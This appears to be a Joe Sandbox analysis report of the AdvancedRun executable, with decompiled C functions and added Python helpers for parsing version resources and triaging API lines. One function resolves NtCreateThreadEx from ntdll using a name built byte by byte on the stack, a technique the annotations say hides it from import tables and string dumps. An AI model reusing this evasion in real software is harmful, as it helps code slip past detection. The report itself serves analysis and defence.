                                                                  				void* _t135;
                                                                  
                                                                  				E0040B550(0x2628, __ecx);
                                                                  				_t45 = _a8 - 0x110;
                                                                  				if(_t45 == 0) {
                                                                  					E00404DA9(__edx, _a4, 4);
                                                                  					_v9772 = 0;
                                                                  					memset( &_v9770, 0, 0xffe);
                                                                  					_t103 = 5;
                                                                  					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                  					memset( &_v1560, 0, 0x1f6);
                                                                  					_v260 = 0;
                                                                  					memset( &_v259, 0, 0xff);
                                                                  					_v516 = 0;
                                                                  					memset( &_v515, 0, 0xff);
                                                                  					_v5676 = 0;
                                                                  					memset( &_v5674, 0, 0x7fe);
                                                                  					_v3628 = 0;
                                                                  					memset( &_v3626, 0, 0x7fe);
                                                                  					_t135 = _t132 + 0x5c;
                                                                  					_t60 = GetCurrentProcess();
                                                                  					_t105 =  &_v260;
                                                                  					_a8 = _t60;
                                                                  					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
                                                                  					__eflags = _t61;
                                                                  					if(_t61 != 0) {
                                                                  						E00404FE0( &_v5676,  &_v260, 4);
                                                                  						_pop(_t105);
                                                                  					}
                                                                  					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
                                                                  					__eflags = _t63;
                                                                  					if(_t63 != 0) {
                                                                  						E00404FE0( &_v3628,  &_v516, 0);
                                                                  						_pop(_t105);
                                                                  					}
                                                                  					_t64 = E00404BD3();
                                                                  					__eflags = _t64;
                                                                  					if(_t64 == 0) {
                                                                  						E004090EE();
                                                                  					} else {
                                                                  						E00409172();
                                                                  					}
                                                                  					__eflags =  *0x4101b8;
                                                                  					if(__eflags != 0) {
                                                                  						L17:
                                                                  						_v1056 = 0;
                                                                  						memset( &_v1052, 0, 0x218);
                                                                  						_t127 =  *0x40f5d4; // 0x0
                                                                  						_t135 = _t135 + 0xc;
                                                                  						_t68 = GetCurrentProcessId();
                                                                  						_push(_t127);
                                                                  						_push(_t68);
                                                                  						 *0x40f84c = 0;
                                                                  						E004092F0(_t105, __eflags);
                                                                  						__eflags =  *0x40f84c; // 0x0
                                                                  						if(__eflags != 0) {
                                                                  							memcpy( &_v1056, 0x40f850, 0x21c);
                                                                  							_t135 = _t135 + 0xc;
                                                                  							__eflags =  *0x40f84c; // 0x0
                                                                  							if(__eflags != 0) {
                                                                  								wcscpy( &_v1580, E00404B3E( &_v1048));
                                                                  							}
                                                                  						}
                                                                  						goto L20;
                                                                  					} else {
                                                                  						__eflags =  *0x4101bc;
                                                                  						if(__eflags == 0) {
                                                                  							L20:
                                                                  							_push( &_v3628);
                                                                  							_push( &_v5676);
                                                                  							_push( *0x40f3b0);
                                                                  							_push( *0x40f3bc);
                                                                  							_push( *0x40f3ac);
                                                                  							_push( *0x40f394);
                                                                  							_push( *0x40f398);
                                                                  							_push( *0x40f3a0);
                                                                  							_push( *0x40f3a4);
                                                                  							_push( *0x40f39c);
                                                                  							_push( *0x40f3a8);
                                                                  							_push( &_v1580);
                                                                  							_push( *0x40f5d4);
                                                                  							_push( *0x40f5c8);
                                                                  							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                  							_push(0x800);
                                                                  							_push( &_v9772);
                                                                  							L0040B1EC();
                                                                  							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                  							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                  							L21:
                                                                  							return 0;
                                                                  						}
                                                                  						goto L17;
                                                                  					}
                                                                  				}
                                                                  				if(_t45 == 1) {
                                                                  					_t130 = _a12;
                                                                  					if(_t130 >> 0x10 == 0) {
                                                                  						if(_t130 == 3) {
                                                                  							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                  							_a4 = _t94;
                                                                  							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                  							SendMessageW(_a4, 0x301, 0, 0);
                                                                  							SendMessageW(_a4, 0xb1, 0, 0);
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				goto L21;
                                                                  			}
                                                                  0x00408ae3
                                                                  0x00408aeb
                                                                  0x00408af3
                                                                  0x00408b76
Statement addresses (continued, one per decompiled line): 0x00408b8a - 0x00408dc5, then 0x00408af6 - 0x00408b6a

                                                                  APIs
                                                                  Strings
                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                  • {Unknown}, xrefs: 00408BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                  • API String ID: 4111938811-1819279800
                                                                  • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                  • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                  • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                  • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 82%
			// Reads the version resource of the file named by _a4 into the caller's record
			// at __edi: six DWORDs taken from VS_FIXEDFILEINFO, then eight StringFileInfo
			// values stored in 0x200-byte (256 WCHAR) slots starting at __edi + 0x18.
			// Returns 1 on success, 0 when the file carries no version information.
			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;            // size of the version block, later VerQueryValueW's out-length
				void* _v12;         // -> VS_FIXEDFILEINFO (root block "\")
				void* _v16;         // -> \VarFileInfo\Translation (WORD language, WORD code page)
				int _v20;           // lpdwHandle out-parameter of GetFileVersionInfoSizeW (always 0)
				long _v60;          // L"llllcccc" language/code-page block name
				char _v572;         // scratch buffer for the probe lookup below
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();                                  // operator new (??2@YAPAXI@Z, ref 0040B07E)
					_t84 = _t50;                                  // heap buffer for the version block
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					// Root block: VerQueryValueW returns a pointer to VS_FIXEDFILEINFO. The
					// decompiler renders the sub-block name as "\\" (pointer 0040CD2C in the API list).
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // dwFileDateLS (not dwFileVersionLS, which sits at +0x0C)
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // dwFileVersionMS
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // dwProductVersionLS
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // dwProductVersionMS
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // dwFileType
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // dwFileSubtype
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					// Pick the StringFileInfo block name: the first (language, code page) pair
					// from \VarFileInfo\Translation, or the hard-coded fallback 040904E4
					// (US English, Windows-1252) if that table is missing or the probe lookup fails.
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);                  // code page
						_push( *_t76 & 0x0000ffff);                   // language id
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();                                  // _snwprintf (ref 0040B0FE)
						// Probe lookup under the derived block name; the key string at 0x40c4e8
						// is not resolved by the decompiler. Failure selects the fallback name.
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					// E0040AFBE(dst, block, langcp, key) is, by its use here, the
					// \StringFileInfo\<langcp>\<key> lookup helper; each value lands in its own
					// 0x200-byte slot of the caller's record.
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();                                  // operator delete (??3@YAXPAX@Z, ref 0040B1D8)
				}
				return _t97;
			}

Statement addresses (one per decompiled line above): 0x0040b04d - 0x0040b1e3

                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                  • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                  • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                  • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                  • _snwprintf.MSVCRT ref: 0040B0FE
                                                                  • wcscpy.MSVCRT ref: 0040B128
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                  • API String ID: 1223191525-1542517562
                                                                  • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                  • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                  • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                  • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
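E0040B04D copies six DWORDs out of the VS_FIXEDFILEINFO root block at fixed offsets and builds the `\StringFileInfo\<lang><codepage>` block name from `\VarFileInfo\Translation`, falling back to `040904E4`. The Python below is an added example, not code from the sample or from the Joe Sandbox report: it parses a VS_FIXEDFILEINFO blob (field layout per the Windows SDK), names the member behind each offset the decompiled code reads, formats the MS/LS version pairs, and reproduces the block-name logic. The sample blob and translation value are constructed here, and the "fewer than four bytes means fall back" condition is my stand-in for the sample's branch on VerQueryValueW's return value.

```python
import struct
from dataclasses import dataclass
from typing import Dict, List, Tuple

# VS_FIXEDFILEINFO: 13 little-endian DWORDs (52 bytes), offsets per the Windows SDK.
FIXEDFILEINFO_FIELDS = [
    (0x00, "dwSignature"), (0x04, "dwStrucVersion"),
    (0x08, "dwFileVersionMS"), (0x0C, "dwFileVersionLS"),
    (0x10, "dwProductVersionMS"), (0x14, "dwProductVersionLS"),
    (0x18, "dwFileFlagsMask"), (0x1C, "dwFileFlags"),
    (0x20, "dwFileOS"), (0x24, "dwFileType"), (0x28, "dwFileSubtype"),
    (0x2C, "dwFileDateMS"), (0x30, "dwFileDateLS"),
]
VS_FFI_SIGNATURE = 0xFEEF04BD
FIXEDFILEINFO_SIZE = 0x34

# Offsets E0040B04D reads from the root block, in the order the decompiled code reads them.
E0040B04D_READS = [0x30, 0x08, 0x14, 0x10, 0x24, 0x28]


@dataclass
class FixedFileInfo:
    fields: Dict[str, int]

    def version(self, which: str) -> str:
        """Format dwFileVersion* or dwProductVersion* as major.minor.build.revision."""
        ms = self.fields[f"dw{which}VersionMS"]
        ls = self.fields[f"dw{which}VersionLS"]
        return f"{ms >> 16}.{ms & 0xFFFF}.{ls >> 16}.{ls & 0xFFFF}"


def parse_fixed_file_info(blob: bytes) -> FixedFileInfo:
    """Parse the 52-byte block that VerQueryValueW(block, L"\\", ...) points at."""
    if len(blob) < FIXEDFILEINFO_SIZE:
        raise ValueError("VS_FIXEDFILEINFO truncated")
    values = struct.unpack_from("<13I", blob, 0)
    fields = {name: values[off // 4] for off, name in FIXEDFILEINFO_FIELDS}
    if fields["dwSignature"] != VS_FFI_SIGNATURE:
        raise ValueError(f"bad VS_FIXEDFILEINFO signature {fields['dwSignature']:#x}")
    return FixedFileInfo(fields)


def is_valid_fixed_file_info(blob: bytes) -> bool:
    """True when the blob is long enough and carries the 0xFEEF04BD signature."""
    try:
        parse_fixed_file_info(blob)
        return True
    except ValueError:
        return False


def field_at(offset: int) -> str:
    """Name of the member behind a decompiler expression such as _t81 + 0x30."""
    names = dict(FIXEDFILEINFO_FIELDS)
    if offset not in names:
        raise ValueError(f"{offset:#x} is not a DWORD boundary inside VS_FIXEDFILEINFO")
    return names[offset]


def translation_block_name(translation: bytes) -> str:
    """Rebuild the StringFileInfo block name the way E0040B04D does.

    \\VarFileInfo\\Translation holds WORD pairs (language id, code page); the sample
    prints the first pair as "%4.4X%4.4X" and falls back to "040904E4" (US English,
    Windows-1252) when nothing usable comes back. Assumption: under four bytes = fall back.
    """
    if len(translation) < 4:
        return "040904E4"
    lang, codepage = struct.unpack_from("<HH", translation, 0)
    return f"{lang:04X}{codepage:04X}"


def fields_copied_by_sample(blob: bytes) -> List[Tuple[str, int]]:
    """The (member, value) pairs E0040B04D's six stores would hand to its caller."""
    ffi = parse_fixed_file_info(blob)
    return [(field_at(off), ffi.fields[field_at(off)]) for off in E0040B04D_READS]


# Constructed sample: file version 1.2.3.4, product version 1.2.0.0, VOS_NT_WINDOWS32, VFT_APP.
SAMPLE_FFI = struct.pack(
    "<13I",
    VS_FFI_SIGNATURE, 0x00010000,
    0x00010002, 0x00030004,     # dwFileVersionMS/LS
    0x00010002, 0x00000000,     # dwProductVersionMS/LS
    0x3F, 0x0, 0x00040004,      # flags mask, flags, dwFileOS
    0x1, 0x0,                   # dwFileType = VFT_APP, no subtype
    0x0, 0x0,                   # no file date
)
# Constructed Translation value: language 0x0409, code page 0x04E4.
SAMPLE_TRANSLATION = struct.pack("<HH", 0x0409, 0x04E4)

if __name__ == "__main__":
    info = parse_fixed_file_info(SAMPLE_FFI)
    print(info.version("File"), info.version("Product"))
    print(translation_block_name(SAMPLE_TRANSLATION))
    for name, value in fields_copied_by_sample(SAMPLE_FFI):
        print(f"{name:<20} {value:#010x}")
```

Running it on a real file means feeding the bytes returned by VerQueryValueW for `\` into `parse_fixed_file_info`; the offset table then tells you directly that the second DWORD the sample keeps is the file date, not the file version's low half.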

                                                                  C-Code - Quality: 76%
			// Lazily resolves one ntdll export into the two-slot record at __esi:
			// __esi[0] = HMODULE of ntdll.dll, __esi[1] = the export's address.
			// The export name is never stored as a string: it is spelled out byte by byte
			// on the stack (the String ID below lists only the loose letters), which keeps
			// it out of the import table and of a plain strings dump.
			// Returns 1 if the handle was already set or was set now, 0 if LoadLibraryW failed.
			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;                       // NUL terminator
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;                      // first character (lowest address)
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;                   // already resolved on an earlier call
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					// Zero-fill the name buffer before writing the characters.
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					// Stored out of order; read from _v24 down to _v8 the bytes spell
					// "NtCreateThreadEx" (N t C r e a t e T h r e a d E x \0).
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					// The result is not checked, so __esi[1] stays NULL on systems
					// where the export is absent.
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}

Statement addresses (one per decompiled line above): 0x0040a1f8 - 0x0040a271

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                  • API String ID: 2574300362-1257427173
                                                                  • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                  • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                  • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                  • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
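
The function above is the only one in this section that resolves an import at run time: LoadLibraryW("ntdll.dll") followed by GetProcAddress with an argument the sandbox could not recover. Its String ID field lists the export name as loose single characters (the String ID fields in this section are the function's strings sorted and joined with `$`, so a name built on the stack one character at a time shows up this way; that reading is the editor's, not a statement of the report). The Python below is an added example and is not part of this sandbox report nor AdvancedRun code. It parses the report's own APIs bullet lines, flags the LoadLibrary/GetProcAddress pairing the report labels "dynamically determine API calls", and tests which ntdll export names are consistent with the listed character multiset. The candidate export list, the line format, and the assumption that the sandbox listed every pushed character exactly once are assumptions. On this input only NtCreateThreadEx in the assumed list fits the letters exactly; that is an inference of the example, not a finding the report makes.

```python
"""Triage helpers for Joe Sandbox function blocks (added example; not part of
the sandbox report and not AdvancedRun code).

Two checks over the report's own text fields:
  1. parse the "APIs" bullet lines and flag the LoadLibrary*/GetProcAddress
     pairing (run-time import resolution);
  2. treat the "String ID" field (strings sorted and '$'-joined; a name
     pushed one character at a time appears as loose letters) as a character
     multiset and test which known ntdll export names fit it exactly.
"""
import re
from collections import Counter

# Constructed from the report lines above (function at 0x0040A1FF).
API_LINES = """
• LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
• GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
"""
STRING_ID = "C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x"

# Assumed candidate list; the report does not name the export being resolved.
CANDIDATE_EXPORTS = [
    "NtCreateThreadEx",
    "NtCreateThread",
    "RtlCreateUserThread",
    "NtSetInformationThread",
    "NtQueryInformationProcess",
    "LdrLoadDll",
]

_API_RE = re.compile(
    r"^\s*[•*-]\s*(?P<api>\w+)\.(?P<mod>\w+)"      # LoadLibraryW.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?"                      # optional (arg,arg,...)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"         # ref: 0040A1FF
)


def parse_api_lines(text):
    """Return one dict per parsed bullet: api, module, args (list), ref (int)."""
    calls = []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["mod"],
                      "args": args, "ref": int(m["ref"], 16)})
    return calls


def runtime_resolution_targets(calls):
    """Libraries named by LoadLibrary* when GetProcAddress is also present.

    Returns [] when the pairing is absent. A '?' argument (value unknown to
    the sandbox) is reported as '?' rather than dropped.
    """
    if not any(c["api"].startswith("GetProcAddress") for c in calls):
        return []
    libs = [c["args"][0] if c["args"] else "?"
            for c in calls if c["api"].startswith("LoadLibrary")]
    return sorted(set(libs))


def split_string_id(string_id):
    """Split a String ID into (Counter of single characters, whole strings)."""
    chars, whole = Counter(), []
    for tok in string_id.split("$"):
        if len(tok) == 1:
            chars[tok] += 1
        elif tok:
            whole.append(tok)
    return chars, whole


def consistent_candidates(string_id, candidates):
    """Candidates whose letters equal the single-character multiset exactly.

    Assumes the sandbox listed every pushed character once; if it merged or
    dropped any, use a subset test instead of equality.
    """
    chars, _ = split_string_id(string_id)
    return [name for name in candidates if Counter(name) == chars]


if __name__ == "__main__":
    calls = parse_api_lines(API_LINES)
    print("run-time resolution via:", runtime_resolution_targets(calls))
    print("export names fitting the String ID:",
          consistent_candidates(STRING_ID, CANDIDATE_EXPORTS))
```

The equality test is deliberately strict: a looser subset test would also accept shorter names such as NtCreateThread and is only appropriate once you know the sandbox dropped characters.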

                                                                  C-Code - Quality: 63%
                                                                  			E00407F8D(void* __eax) {
                                                                  				struct _SHFILEINFOW _v692;
                                                                  				void _v1214;
                                                                  				short _v1216;
                                                                  				void* _v1244;
                                                                  				void* _v1248;
                                                                  				void* _v1252;
                                                                  				void* _v1256;
                                                                  				void* _v1268;
                                                                  				void* _t37;
                                                                  				long _t38;
                                                                  				long _t46;
                                                                  				long _t48;
                                                                  				long _t58;
                                                                  				void* _t62;
                                                                  				intOrPtr* _t64;
                                                                  
                                                                  				_t64 = ImageList_Create;
                                                                  				_t62 = __eax;
                                                                  				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
                                                                  					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
                                                                  						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                  						 *(_t62 + 0x2a8) = _t48;
                                                                  						__imp__ImageList_SetImageCount(_t48, 0);
                                                                  						_push( *(_t62 + 0x2a8));
                                                                  					} else {
                                                                  						_v692.hIcon = 0;
                                                                  						memset( &(_v692.iIcon), 0, 0x2b0);
                                                                  						_v1216 = 0;
                                                                  						memset( &_v1214, 0, 0x208);
                                                                  						GetWindowsDirectoryW( &_v1216, 0x104);
                                                                  						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001); // 0x4001 = SHGFI_SYSICONINDEX | SHGFI_SMALLICON: returns the shell's system image list
                                                                  						 *(_t62 + 0x2a8) = _t58;
                                                                  						_push(_t58);
                                                                  					}
                                                                  					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??); // 0x1003 = LVM_SETIMAGELIST, 1 = LVSIL_SMALL
                                                                  				}
                                                                  				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
                                                                  					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
                                                                  					 *(_t62 + 0x2ac) = _t46;
                                                                  					__imp__ImageList_SetImageCount(_t46, 0);
                                                                  					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
                                                                  				}
                                                                  				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
                                                                  				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
                                                                  				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
                                                                  				_v1244 = _t37;
                                                                  				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
                                                                  				_t38 = GetSysColor(0xf);
                                                                  				_v1248 = _t38;
                                                                  				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
                                                                  				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
                                                                  				DeleteObject(_v1268);
                                                                  				DeleteObject(_v1268);
                                                                  				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4)); // 0x1208 = HDM_SETIMAGELIST (HDM_FIRST + 8)
                                                                  			}

                                                                  Statement addresses (decompiler view): 0x00407f9b to 0x00408150

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00407FD0
                                                                  • memset.MSVCRT ref: 00407FE5
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                  • LoadImageW.USER32 ref: 004080B4
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                  • LoadImageW.USER32 ref: 004080D1
                                                                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                  • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                  • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                  • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                  • DeleteObject.GDI32(?), ref: 00408121
                                                                  • DeleteObject.GDI32(?), ref: 00408127
                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                  • String ID:
                                                                  • API String ID: 304928396-0
                                                                  • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                  • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
